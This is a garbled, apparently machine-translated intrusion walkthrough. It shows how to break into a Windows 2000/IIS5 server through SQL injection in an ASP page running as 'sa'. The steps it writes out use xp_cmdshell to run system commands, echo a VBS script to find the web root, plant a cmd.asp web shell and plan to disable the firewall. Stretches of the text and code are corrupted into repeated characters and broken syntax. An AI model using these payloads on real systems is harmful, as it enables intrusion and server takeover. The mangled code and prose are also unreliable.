Host configuration: win2kserver (sp3) Sygate Personal FireWall Pro Security setting: Do not say too ** actually only allow 80 into the scan: first use X-scan2.3 to sweep only 80, then sweep over, still The same result, it seems that the administrator is not stupid! Check the system cave: first ping, it is not passing, but the result of the scanning is very clear, it should be IIS5, add a web page. Such a host is of course Win2K, don't say it. Analysis: 也 分析 分析 入 8 入 东 东 东 东 东 东 系统 系统 系统 系统 系统 系统 系统 系统 系统 系统 系统 系统 系统 系统 东 东 东 东 东 东 东 东 东 东 东 东 东 东 东 东 系统 东 单 东 东 系统 东 东 系统 东 系统For odbc drivers (0x80040e14) /mingce/student1.asp, the 30th line seems to be too bad ........ There should be SQL injected harsh ......... In order to further Confirm that the test is charged http: //xxx == "THEN SET CONN = Server.createObject (" AdoDb.Connection ") conn.open" driver = {SQL Server}; server = localhost; database = xxxx; uid = sa; pwd = "& applibility (" mm_xxx ") is longer The above three lines are most important: We can see that the ASP background program does not use any filtering for the user, and the agodb.connection object used by the database (if it is adoDb.command, it is not possible to filter the special symbol), of course, It can be seen that the SA used by the database is connected! (TIP: In fact, even if we can't see the source code of the ASP, we can also try XP_cmdshell 'Iisreset / Reboot' or XP_cmdshell 'ping you .ip', if the first If the command can perform successfully, the remote system is restarted in half, the second command that you own is usually prompted to send ICMP data to you to the XXXX host, but for this prohibition any data. The second command of the host may not be 哟) What can we do with the above analysis: Enforce system commands as administrators in the web page (but no return) If it is a general system host, XP_cmdshell 'Net User .....' I Do not write, but we now have only an 80-port system, even if we can add admin users, it is usually necessary to open 139/445/135, you can manage it remotely, but now I don't work. My think: 1) Find the path of the web directory 2) Write a simple cmd.asp to find the specific name of the firewall 3) Turn off the firewall service to close the firewall service: The first step is the most difficult, I originally intended to use admins cripts Construction of a Web Station to build a result of my self-executable directory. Then I thought I was executed using the adsutil.vbs program. I'm doing this. 'CMD / C CS CRIPT C: / INETPUB /adminscrips/adsutil.vbs Enum w3svc / 1 / root> a.txt '; - isn't very long :) Through it we can put the setting of the first virtual Web site in IIS (of course, including it Directory) Import to A.txt Actitude Position for A.TXT is of course C: / Winnt / System32, in fact, this is not a problem,
But encountering an administrator to delete the adsutil.vbs or put it in other places, there is no way (it is impossible to write one with the echo command) Step 2: Write the following code to C: / medium , A lot, don't you count :) ..... xp_cmdshell 'echo set fso1 = creteObject ("s cripting.filesystemObject")> c: /read.vbs'; - ..... XP_cmdshell' echo set wshshell = WS cript.createObject ("ws cript.shell") >> C: /Read.vbs'; - ..... ------------------- Read .vbs --------------------------------- set fso1 = creteObject ("s cripting.filesystemObject") set wshshell = WS CRIPT.CREATEOBJECT ("ws cript.shell") spa = wshshell.environment ("process") ("Windir") set fil = fso1.opentextfile (spa & "/system32/aa.txt") Do While NOT FIL. Atendofstream nr = fil.readline if left (NR, 4) = "path" THEN PA = MID (NR, INSTR (NR, ")") 3, LEN (NR) -instr (nr, ")") - 3 EXIT DO END IF LOOP SET FIL1 = FSO1.OpenTextFile (Pa & "/ DD.ASP", 2, TRUE) FIL1.WRITELINE "<% response.write request.serverVariables (" "" "" "" "" "" --- ------------ Cut Here ---------------------------------------------------------------------------------------------- - Step 3: Of course, it is to execute read.vbs, so we can read the contents of aa.txt to find the actual path of the Web site and write a file called Dd.asp in the root of the Web Station, can No, try again. Http: //xxxx/dd.asp returns: D: / xxx seems that I am lucky. "There is a problem is that the first Web site we find may not pass XXXX to ask) fourth Step: That is to generate cmd.asp with the echo command, it's not long, it's 20 lines, it's actually on some websites (usually a virtual host) cmd.asp can't be executed, but this host is a separate server. So the administrator has not been banned ------------------------ CMD.asp ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------- <% on error resume next set os cript = server.createObject ("WS cript.shell") set os criptnet = server.createObject ("" WS Cript.network "") set ofilesys = server.createObject ("s cripting.filesystemObject") Szcmd = request.form (". cmd" "
(Szcmd <> "" "" "c: /" & ofilesys.gettempname () Call OS Cript.Run ("CMD.exe / C" & Szcmd & ">" & Szcmd & " Sztempfile, 0, true) set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0) end if%>
